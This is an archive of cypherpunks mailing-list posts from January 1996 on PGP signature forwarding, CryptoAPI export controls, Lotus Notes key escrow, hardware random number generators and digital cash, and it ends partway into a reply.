Date: Thu, 18 Jan 1996 09:11:36 +0800
To: cypherpunks@toad.com
Subject: Re: A weakness in PGP signatures, and a suggested solution
In-Reply-To: <199601171613.IAA11904@mail.eskimo.com>
Message-ID: <DFiVHD23w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Brian C. Lane" <blane@eskimo.com> writes:
> > > In article <Pine.ULT.3.91.960110182255.18692H-100000@xdm011>, Jeffrey Gol
> >
> > But then the recipient has a PGP-signed message from you which
> > isn't encrypted (using pgp -d). That person could then impersonate
> > you. Eg Alice the jilted lover could resend the goodbye message
> > with forged headers to Bob's new girlfriend to get back at him.
>
>   Ah ha! Now I understand what this argument has been all about. This
> is not a flaw with PGP, but with the software doing the signing. It
> should/could add a line with a time and date stamp inside the
> signature envelope, or Bob could add more information, making the
> message more specific.
>
>   I don't think PGP needs to be 'fixed', but the signing software
> does.

I think a two-fold fix would be welcome;

1. The signing software needs to copy these headers within the body in
a standard way. I think I've seen a couple of such hacks already.
That's a welcome idea.

2. When PGP verified the signature, it should have an option to look outside
the signed portion for RFC 822 headers and compare them to the signed copy
of he headers inside. If this is not in PGP, then then function would have to
be done by some non-portable wrapper.
(Of course, if your headers aren't RFC 822, you're out of luck.)

(As someone pointed out, PGP already time-stamps the signature.)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 20 Jan 1996 00:44:40 +0800
To: Tom Johnston <cypherpunks@toad.com
Subject: Re: CryptoAPI and export question
Message-ID: <v02120d0fad236da5978f@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 18:07 1/17/96, Tom Johnston wrote:
>Two points:  the CSP development kit is export-controlled; and signing a
>CSP developed by a foreign vendor is treated as a export -- so the signature
>is export-controlled.
>
>We would ship a CSP development kit to a foreign vendor, and sign a CSP
>developed by the foreign vendor, but only with the appropriate export licenses.

So the main thing that the new MS CSP accomplishes is to establish a
standard that will prevent foreigners at the OS level from using real
crypto with popular applications. Way to go Microsoft.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 22 Jan 1996 03:52:49 +0800
To: cypherpunks@toad.com
Subject: Re: SHA-2
In-Reply-To: <Pine.3.89.9601171231.A16122-0100000@aix2.uottawa.ca>
Message-ID: <DLCCvL.482@news2.new-york.net>
MIME-Version: 1.0
Content-Type: text/plain



I don't know if the revision is official or proposed. I first heard
about it in a post to alt.security (I saved the message somewhere)
which contained ref's in the federal register.  I've seen other
implementations that make the same fix.

The difference that when the expansion function is performed, it rolls
the dword 1 bit left before putting it in the W[] array.

--Rob

s1018954@aix2.uottawa.ca writes:

[..]
>Schneier mentioned last year in one of his conference reports that SHA
>was being revised, yet I couldn't find it in Applied Crypto 2 (I admit
>that I don't yet own the new one, and I haven't taken a good enough look 
>while browsing it in the bookstores), anyone have any pointers to the new 
>spec?

>Please correct me if I am wrong.
>TIA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alexander 'Sasha' Chislenko" <sasha1@netcom.com>
Date: Fri, 19 Jan 1996 10:03:50 +0800
To: cypherpunks@toad.com (Cypherpunks mailing list)
Subject: Re: underground digital economy
Message-ID: <2.2.32.19960118010840.00e13e78@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:39 PM 1/17/96 -0600, jim@bilbo.suite.com (Jim Miller) wrote:
>
>The existing underground economy uses the same money as the aboveground  
>economy (i.e. paper money, for the most part).  Could a significant  
>underground digital economy develop if the aboveground digital economy  
>used only identified e-money?
>
  Let's consider a general case: we have a number of market segments,
and a number of currencies.  The currencies may float between the markets
and translate into one another.

  If the currencies are independent from the markets, the flow of funds
may cross the currency boundary, then a market boundary (or vice versa).
If not, these crossings maybe synchronized - to enter the next market
segment, you have to exchange the currency. All you need to have all
the "economies" running is some gates between the currencies somewhere
in the system.

  There are lots of alternative currencies in any society, including
balances of personal favors between people; usually they do not have
currency conversion problems, even if explicitly regulated.

  If you sell a new version of CryptoDoom for digicash, and would like to
buy a car that is only sold for paper money, and I have a car to sell and
want to buy your CryptoDoom, *somewhere* in the market there will appear
an exchange agent that would help us complete the transaction. In the
case of parallel digital currencies this exchange market would be very
liquid because of the high speed, low cost, and security/privacy of the
transactions.

  I have some personal experience with similar issues, in my attempts
to move money in and out of Russia. In these transactions cash rarely
crosses the border.  If an American A1 wants to send some dollars to
a Russian R1 who needs roubles, and a Russian R2 wants to send some
roubles to American A2 who needs dollars, then A1 pays dollars to A2,
and R2 pays roubles to R1.  Since both inter-market and inter-currency
transactions should be balanced, such schemes would always be possible.

-----------------------------------------------------------------------
Alexander Chislenko <sasha1@netcom.com>
Public Home page:        http://www.lucifer.com/~sasha/home.html
World Future Society[B]: http://www.lucifer.com/~sasha/refs/wfsgbc.html
-----------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 18 Jan 1996 20:58:21 +0800
To: cypherpunks@toad.com
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601172347.SAA19227@bb.hks.net>
Message-ID: <199601180132.UAA00759@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alan Pugh writes:
> infoMCI (sm)
> Lotus-Security - Lotus Announces Compromise for Export of Strong
> Encryption

So, Lotus thinks they can fool people by back-dooring in key escrow, eh?

Time to break out the artillery.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sat, 20 Jan 1996 05:34:13 +0800
To: cypherpunks@toad.com
Subject: Re: FW: CrytoAPI on Cypherpunks
Message-ID: <sDmVHD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Johnston <tomj@microsoft.com> writes:
> >>> We won't charge high fees (right now, it's free!).  Our policy is
> >>> simple:  we'll sign the CSP of anyone who follows the rules.

Would you sign a foreign-developed CSP (which isn't subject to the rules)?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Thu, 18 Jan 1996 12:54:34 +0800
To: warlord@ATHENA.MIT.EDU (Derek Atkins)
Subject: Re: A weakness in PGP signatures, and a suggested solution
In-Reply-To: <199601180344.WAA26221@charon.MIT.EDU>
Message-ID: <199601180442.UAA15648@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


Derek Atkins writes:
[Dr Dimitri writes:]
> 
> > 2. When PGP verified the signature, it should have an option to look outside
> > the signed portion for RFC 822 headers and compare them to the signed copy
> > of he headers inside. If this is not in PGP, then then function would have to
> > be done by some non-portable wrapper.
> > (Of course, if your headers aren't RFC 822, you're out of luck.)
 
[..]
 
> PGP really only looks at the contents between the BEGIN and END.  It
> can't do anything else.  In fact, only the PGP Armor code even deals
> with that.  By definition, PGP is a binary protocol and deal with
> binary data objects.  So how can it look at any "RFC 822 Headers"?
> There are no such animals in PGP.  It is perfectly legal to remove all
> data before the BEGIN and all data after then END and feed the result
> to PGP...
> 
> As I said, armor is a convenience to the user only.
> 
> PGP will not be modified in this way; it is the job of the mailer
> (MUA) to do this sort of thing.  Sorry.

I agree.
PGP should be as generic as possible; making it "know" about RFC822
and mailers makes it less generic.

Your PGP-aware mail agent should add a line to the text to be
encrypted, consisting of a random number (hopefully very unguessable
and fairly random) and an RFC822 header:

X-PGP-nonce: b1de70694f5f0824f89cb3f09aece01d

and replicate that in the RFC822 envelope.
Put just the nonce value and not the header in the block to be
encrypted if you're concerned about assisting a known-plaintext attack.

The nonce can't be extracted from the PGP ciphertext unless the attacker
has the ability to crack PGP, in which case merely re-directing
PGP encrypted messages to different recipients is beneath them. :-)
It is small and is easily verified by the human looking at the message.
PGP, or more accurately the MUA, won't need to check it (although
that would be fairly easy to do).

But like Derek says, PGP shouldn't do it, the MUA should.

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nelson Minar <nelson@santafe.edu>
Date: Sun, 21 Jan 1996 17:19:18 +0800
To: cypherpunks@toad.com
Subject: Re: Spiderspace
In-Reply-To: <199601170613.WAA08830@ix5.ix.netcom.com>
Message-ID: <199601180354.UAA14857@nelson.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain


>... I was under the impression that the only documents that most web crawlers
>will search are documents that are link-accessible.  Are you saying that this
>isn't true?  Are you saying that Alta-Vista will search EVERYTHING that's
>publicly accessible, whether by anonymous FTP or web?

I'm not sure about alta-vista, but most spiders just follow the Web
doing some sort of graph search algorithm: pages are nodes and links
are directed edges. If a page is not linked anywhere, I don't see how
a spider could find it.

But you might be suprised at how quickly links to your pages can be
made, in unexpected ways. Before alta-vista went online, I set up an
archive of a private mailing list for a class, put it on the web, and
figured obscurity would keep it safe. Within six hours of putting this
page online and emailing about it to my class, the alta-vista spider
had found it. Now maybe that six hours was just random chance, but I
was pretty impressed. I still don't know how the spider found it - my
guess is someone had made a Netscape bookmark to my page and had put
their bookmark file online.

All the spiders and Usenet search engines imply is that the haystack
is becoming easier to search for needles. The Web and the Usenet are
fundamentally public media - a spider has as much right to index your
pages as JoeBob has a right to make a bookmark to it. The good thing
is these spiders are fundamentally useful critters. alta-vista is
about to replace Yahoo for my preferred way to find things. See
  http://www.santafe.edu/~nelson/hugeweb.html
for a little thought I had one evening.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Thu, 18 Jan 1996 05:30:37 +0800
To: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Subject: Re: Random Number Generators
In-Reply-To: <0kzHl6200bky0_dkQ0@andrew.cmu.edu>
Message-ID: <Pine.BSD.3.91.960117202900.3807G-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Jan 1996, Timothy L. Nali wrote:

> Hi all
> 
> 	For a class project, I will be designing a VLSI cmos chip to generate
> truly random numbers (The chip will be fabricated).  I'm limited to a
> 2-micron standard cmos technology (no fancy BiCMOS, MISC, or anthing
> else).  The most promising design I've seen so far (that I can actually
> do) is based on clocking a D flip-flop in the following way:
> 
> 
> 			         	-----
> 	8Khz clock ------	| 	|----- Random output
> 				|	|
> 				|	|
> (sloppy) slow clock	----  |>	|
> 				|	|
> 				-----
> 

	you can enhance the thermal stability with a temperature control
    scheme.

	and you can virtually eliminate voltage problems with separate
    regulation.

	use a digital oscillator and clean up the edges.

	would you not be better off for true randomness to use a) a
    > 8Mz clock, and b) to chain the output of one into the control gate
    of a second?  I think that gives you better spectral distribution
    presuming you use a second clock frequency.
 
	unlike most, I am still of the opinion that digital means of
    generating this should be more uniform. otherwise, use a 
    high-frequency diode, analog weight the curve, analog high-pass it,
    sample it, and go for it.  or take several TV stations, phase and mix
    the horizontal scans, etc.  --but I thought this was a digital project
    for CMOS  --actually CMOS can generate white noise, but you probably 
    will end up with a DSP on your chip! 

	biasing should be controllable with edge control.

	However, all of above needs to be bench tested for the practical
    results --keeping in mind measuring randomness of segments of a bit
    stream are "impossible"  --thoroughly frustating. 

	another schema is to play the old enigma game of lining up the
    spinning wheels -that works digitally, the gates on CMOS are not
    too hairy  -the question is how many wheels and their relative
    rotation (including direction)?  and, how many levels?

	how much real estate do you have at 2u? I ask because the
    use of the rotating wheels has been an old project I dumped since
    fab was far to expensive in the 70s --but it has held my interest.

	there has also been a thorough trashing or thrashing of RNG
    recently which should be in the archives.
 
> I'd also appreciate any other suggestions or advice you have on RNGs.
> 
> Thanks in advance.
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 18 Jan 1996 12:12:23 +0800
To: cypherpunks@toad.com
Subject: RE: Random Number Generators
Message-ID: <ad23011f0602100485aa@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:40 PM 1/17/96, Kurt Buff (Volt Comp) wrote:
>If you're going to work with hardware to get really random numbers, why not
>go to the back of any of several PC-type magazines, and order the radiation
>detector board that someone is hawking? Can't really do any better than
>that, can you? Counting cosmic ray hits and noting their time differentials
                         ^^^^^^^^^^^^^^^
>should be just what the doctor ordered, right?

Almost all of the counts in simple radiation detectors are from earthly
sources, not from cosmic rays. For Geiger tube counters (not very common
these days), the main counts are for gamma rays and for beta particles (if
a beta window is included). For solid-state detectors, most of the counts
are still betas and gammas, even though solid-state detectors (e.g., PIN
diodes) are certainly _capable_ of detecting alpha particles. The reason is
that alphas are very nonpenetrating, so alpha detectors for intentional use
must have extremley thin (and hence fragile and expensive) windows or
protective layers. Basically, it makes little sense to count alphas when a
rough radioactivity measurement is sought, as with cheap detectors.

Solid state detectors specially set up with alpha sources in proximity to
the detector are possible, but are a specialty item.

RNGs based on thermal noise and natural radioactivity have been discussed
on our list at least a dozen times (multiple posts each time), so I suggest
further research be done there.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Sat, 20 Jan 1996 00:48:06 +0800
To: cypherpunks@toad.com
Subject: CAPI endorsements
Message-ID: <2.2.32.19960117160205.0068a0fc@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From MS's Web page on their CryptoAPI, under the 'Endorsements' section:

RSA 



"We're pleased to see Microsoft's announcement of CryptoAPI and CryptoAPI's use of RSA technology. This announcement makes more robust cryptography more easily available to more people--and RSA believes that's always a good thing." 
      -- Jim Bidzos, President, RSA Data Security, Inc. 

I gotta wonder if that's why RSA wants Too Damn Much (tm) for licenses.....

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMP0A6cVrTvyYOzAZAQErUAQAsOc6acpfRtytyjeyxpGpMzSPEnvqXUqr
vYHEIWWqm7On/qWDbkqrsl47EBc7K57hpXIX3kzeiYbko7P+4ndIFlA/yRVs+L6X
mpUrqsvGy6/kadAy2AnwPefRkaTbflrtamSMfdQwF+7Du6x/tL/z/UpASA/2sx8e
p5IdH9kYmfs=
=RPRO
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: myrkul@limestone.kosone.com
Date: Thu, 18 Jan 1996 12:04:15 +0800
To: cypherpunks@toad.com
Subject: mailing list
Message-ID: <9601180323.AA27800@limestone.kosone.com>
MIME-Version: 1.0
Content-Type: text/plain


please add my address to the mailing list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Sat, 20 Jan 1996 00:48:00 +0800
To: a-kurtb@microsoft.com
Subject: Re: underground digital economy
Message-ID: <9601180428.AA11604@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain




> Certainly. There are a couple of ways, but all one needs is
> some sort of  gateway to an e-cash
> 


This is the part that bothers me.  Wouldn't a gateway between anonymous  
e-money and identified e-money would stick out like a sore thumb to  
agencies tracking the flow of identified e-money?  Wouldn't identified  
e-money trails start and/or terminate at the gateway?  Once the gateway is  
discovered, all clients on the identified e-money side of the gateway  
would be discovered.

I think the gateway could only succeed if there was a way to perform the  
conversion anonymously.  But how do you anonymously generate/propagate  
identified e-money?

There is probably an obvious solution, but I'm not devious enough to see  
it.  One unstated assumption I have that may be confounding me is that I  
assume the identified e-money system will completely replace paper money,  
which will then be "discontinued".

Jim_Miller@suite.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Sun, 21 Jan 1996 17:19:12 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: A weakness in PGP signatures, and a suggested solution
In-Reply-To: <DFiVHD23w165w@bwalk.dm.com>
Message-ID: <199601180344.WAA26221@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> 2. When PGP verified the signature, it should have an option to look outside
> the signed portion for RFC 822 headers and compare them to the signed copy
> of he headers inside. If this is not in PGP, then then function would have to
> be done by some non-portable wrapper.
> (Of course, if your headers aren't RFC 822, you're out of luck.)

How?  PGP has no idea what is around the PGP message.  Also, the PGP
armor is, by definition, not a cryptographic manipulation, rather it
is just a tool for convenience.  The Armoring done by PGP could just
as easily be done by MIME or UUEncode; the functionality is just the
same as far as PGP is concerned.  The only difference is for the user,
who knows that "BEGIN PGP MESSAGE" means feed this data to PGP rather
than feeding it to some other program.

PGP really only looks at the contents between the BEGIN and END.  It
can't do anything else.  In fact, only the PGP Armor code even deals
with that.  By definition, PGP is a binary protocol and deal with
binary data objects.  So how can it look at any "RFC 822 Headers"?
There are no such animals in PGP.  It is perfectly legal to remove all
data before the BEGIN and all data after then END and feed the result
to PGP...

As I said, armor is a convenience to the user only.

PGP will not be modified in this way; it is the job of the mailer
(MUA) to do this sort of thing.  Sorry.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Thu, 18 Jan 1996 13:03:43 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: A weakness in PGP signatures, and a suggested solution
In-Reply-To: <199601180442.UAA15648@slack.lne.com>
Message-ID: <199601180452.XAA26447@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> Your PGP-aware mail agent should add a line to the text to be
> encrypted, consisting of a random number (hopefully very unguessable
> and fairly random) and an RFC822 header:
> 
> X-PGP-nonce: b1de70694f5f0824f89cb3f09aece01d
> 
> and replicate that in the RFC822 envelope.
> Put just the nonce value and not the header in the block to be
> encrypted if you're concerned about assisting a known-plaintext attack.

Actually, that doesn't work either -- if I wanted to forward the
message you sent me to someone else to make them think that you sent
it to them, I could just take the nonce and put that in the header of
my forwarded message and it would match...

No, you need to include the "to" and "cc" fields as well inside the
signed message.  But again, the MUA should do this, not PGP.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Thu, 18 Jan 1996 14:21:50 +0800
To: Tom Johnston <tomj@microsoft.com>
Subject: Re: CryptoAPI and export question
Message-ID: <Pine.SUN.3.91.960118010940.11392A-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 17 Jan 1996, Tom Johnston wrote:

> Two points:  the CSP development kit is export-controlled; and signing a
> CSP developed by a foreign vendor is treated as a export -- so the signature
> is export-controlled.

The *signature* is export controlled?!?  What the hell kind of sophistry 
could the State Department use to deny an export license to a signature?  

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 18 Jan 1996 13:15:22 +0800
To: cypherpunks@toad.com
Subject: Attack Simulator
Message-ID: <199601180250.DAA29088@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Internet Scanner Software Checks Network Security 
     
Atlanta, Jan. 17 -- Internet Security Systems has
released version 3.2 of its Internet Scanner software. 
The company said the program is an "attack simulator"
that tests your organization's network for security
holes.  

ISS said Internet Scanner 3.2 has enhanced reporting
capabilities and added tests for more than 130 security
vulnerabilities, including the recently revealed
Microsoft File Sharing bug. "Our added focus on Microsoft
security holes stems from our customers' rapid adoption
of TCP/IP (Transmission Control Protocol/Internet
Protocol)-enabled Microsoft Windows NT and Windows 95,"
said Chris Klaus, founder and chief executive officer of
ISS.  

According to Don Ulsch, a security consultant affiliated
with the National Security Institute in Westborough,
Massachusetts, The movement to Windows 95 created a whole
new set of security concerns for network administrators.
"Similar to virus scanning software, a security scanning
tools' value to a corporation declines quickly unless it
can detect the latest security holes. In the security 
arena, every upgrade is crucial," said Ulsch.  

New features of Internet Scanner 3.2 include added
reporting capabilities including hyperlinks that connect
to CERT advisories and vendor World Wide Web sites to
pull down patches and information regarding network
holes, and addition of Linux as a supported platform. The
company said that will allow easy scanning from laptop
PCs.  

The additional tests added to the new version include the
Microsoft File Sharing bug, the TelnetD bug, the Stealth
Scan, Finger Bomb, and misconfigured Linux NIS services. 

The company said its customers who have current
maintenance contracts can now electronically download the
updated version from the USS Web home page at
http://iss.net.  

Internet Security Systems, tel 770-441-2531, fax
770-441-2431  











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 18 Jan 1996 19:22:04 +0800
To: stevenw@best.com (Steven Weller)
Subject: Re: A Modest Proposal: Fattening up the Proles
Message-ID: <2.2.32.19960118110434.0092d8d8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:46 PM 1/17/96 -0800, Steven Weller wrote:

>See also _The End of Work_ by Rifkin. It chronicles changing work patterns
>from agriculture through mass manufacturing and the service age on to an
>uncertain future. Lots of interesting numbers and "look what is already
>happening" statements. It also shows that the changes are inexorable, just
>as the decline in agriculture based on human and animal labor was.

Except when I had Rifkin on the phone on a National Commie Radio talk show
he dishonestly refused to admit the fact that -- so far -- employment in the
US (total and percentage workforce participation) is higher than it's ever been.

A lot of that is the commie belief that a job is something someone else
gives you rather than something that you do.  It's a bit hard to be without
work if you assign it to yourself.  And if wants are unlimited then one of
the "goods" for which wants are unlimited is labor.

DCF

"A job he calls it!  Reading the legal notices in the Times searching for
unclaimed bequests in his name." -- The New Yorker





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <Jeremym@area1s220.residence.gatech.edu>
Date: Thu, 18 Jan 1996 23:03:33 +0800
To: "cypherpunks@toad.com>
Subject: Re: ITSEC?
Message-ID: <2.2.32.19960118133432.00923e2c@area1s220.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 AM 1/18/96 -0000, Juan D. Sandoval wrote:

>does anyone know where I can get info on Information Technology 
>Secure Evaluation Criteria (ITSEC)?

Here's what I found:

------------------------>
Excerpted from _Computer_Security_Handbook,_Third_Edition_ by Hutt,
Bosworth, & Hoyt
(C) 1995 by John Wiley and Sons:

(d) European and Canadian Security Standards.  
        Since its original publication in 1983, the TCSEC has greatly
influenced It security.  It is widely recognized as a yardstick for
evaluating products in relation to security features and assurances needed
to support security objectives.  TCSEC has also influenced the development
of other documents both in the US and abroad, forming a foundation of
second-generation requirements.
        In 1991, the European Community adopted the Information Technology
Security Evaluation Criteria (ITSEC) for a two year trial period.  The ITSEC
approach uses "Security Targets" for expressing security functionality
profiles.  ITSEC was builtin upon various national initiatives, including
the TCSEC, and represents a /harmonized/ effort among Franfce, Germany, the
Netherlands, and the United Kingdom.

------------------------>
A quick search of INSPEC (described below) turned up some useful results, as
well.

INSP (INSPEC) 
        Citations and abstracts of articles in physics, electronics,
engineering, computer and information technology journals. 

A keyword search for ITSEC revealed 30+ documents related to IT and systems
security measures.  The citation below seemed the most useful:

        Sizer, R.  "Information technology security evaluation criteria
(ITSEC)."  _Computer_Bulletin_, vol.5, pt.5, p.7.  Oct. 1993.   ISSN:
00104531 ;;gtec.  Keywords: data integrity. data privacy. security of data.
Class codes: C0310D. C6130S.  Date indexed: 12/93.

Abstract:
        The insecurity of IT systems (typified by unauthorised access) is a
complex and increasingly aggravating social problem. All sectors of
society-commerce, industry, government (local and national) and domestic are
at risk. People who have the responsibility for choosing, installing or
using IT systems have faced considerable difficulty in choosing IT security
products purporting to provide a 'secure environment' employing technical
security mechanisms in hardware and software. The problem has, in the main,
been the highly subjective claims for, and interpretation of, those security
mechanisms. The ITSEC criteria involve the independent evaluation of IT
products and systems (hardware and software) which claim security features.
Security includes confidentiality, integrity and availability

------------------------>

This citation may also be useful, but the text of the paper is in German.

        Peleska, J. and Reichel, H. of Deutsche Syst.-Tech. GmbH, Kiel,
Germany.  "Formal specification of generic ITSEC functionality classes."
_Informatik_-_Wirtschaft_-_Gesellschaft_ (Informatics - Economy - Society).
p.354-64, 1993.  ISSN: 3540571922;;gtec.  Conference: Informatik Wirtschaft
Gesellschaft (Informatics, Economy, Society), Dresden, Germany, 27 Sept.-1
Oct. 1993.  Keywords: formal specification. software quality. standards.
Class. Codes: C6110B.  Date Indexed:  10/94.

Abstract:
        On the basis of the formal specification, the consistency of
specification of a concrete product to the ITSEC standards is not only
informally motivatable, but also mathematically provable. In this way, the
objective visability, quality and efficiency of the evaluation process are
increased. For the evaluation of products at Stage E6, use of the described
concepts (or of comparable ones) is indispensable

------------------------>

I have access via my local library to the first document (the actual ITSEC
specification) but not to the second.  You should be able to find the
_Computer_Bulletin_ at most universities with CS majors.

Hope this helps,

Jeremy
---
   Jeremy Mineweaser     | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
 j.mineweaser@ieee.org   | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@ !y-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Juan D. Sandoval" <sandoval@cic.teleco.ulpgc.es>
Date: Thu, 18 Jan 1996 18:38:48 +0800
To: "cypherpunks@toad.com>
Subject: ITSEC?
Message-ID: <01BAE590.53F311C0@pcjdsandoval.teleco.ulpgc.es>
MIME-Version: 1.0
Content-Type: text/plain



does anyone know where I can get info on Information Technology 
Secure Evaluation Criteria (ITSEC)?

I think it is more or less like "the orange book" but in Europe.

Thanks






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 19 Jan 1996 00:25:37 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus to export 64 bit, partially-escrowed Notes
In-Reply-To: <m0tcgtN-0008xeC@pacifier.com>
Message-ID: <199601181533.KAA00501@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


Bell:
> 
> >A new 'international' version of Lotus notes is being released, with
> >64 bit session keys, as opposed to the old 40 bit version.
> >
> My "vote"?  They're "caving-in."
> 

WSJ called it that today.......
	"caving in to intense government pressure"


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R. J. Harvey" <harveyrj@vt.edu>
Date: Fri, 19 Jan 1996 00:10:12 +0800
To: perry@piermont.com
Subject: Re: noise levels
Message-ID: <199601181533.KAA28653@sable.cc.vt.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM 1/18/96 -0500, Perry wrote:
>
>The noise levels around here are getting astounding.
>
>Posts on windows registration wizards, gun control, unemployment,
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>Kevin Mitnick's underwear, and all the rest are most certainly NOT
>doing us any good.
>...
>, and YOU DUNDERHEADS
>ARE MAKING IT IMPOSSIBLE TO CARRY OUT IMPORTANT DISCUSSIONS.
>

   Well, I'm sure you're correct on most of those,
but the post on Microsoft using ENCRYPTED databases
of competitor programs as part of its plan to surreptitiously
collect information from unsuspecting users when they allow
their "wizard" to violate their PRIVACY seems to be 
quite germane to this lists's topics (which include
encryption and privacy, as I recall).   I found the
reference it pointed to very interesting reading indeed.

rj





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 19 Jan 1996 00:29:43 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: Crippled Notes export encryption
In-Reply-To: <199601172347.SAA19227@bb.hks.net>
Message-ID: <199601181539.KAA00520@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


How long before someone posts a patch to break the ""feature""
that does this?

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Fri, 19 Jan 1996 00:26:28 +0800
To: Jim_Miller@bilbo.suite.com
Subject: Re: underground digital economy
In-Reply-To: <9601180428.AA11604@bilbo.suite.com>
Message-ID: <199601181543.KAA09099@homeport.org>
MIME-Version: 1.0
Content-Type: text


Jim Miller wrote:

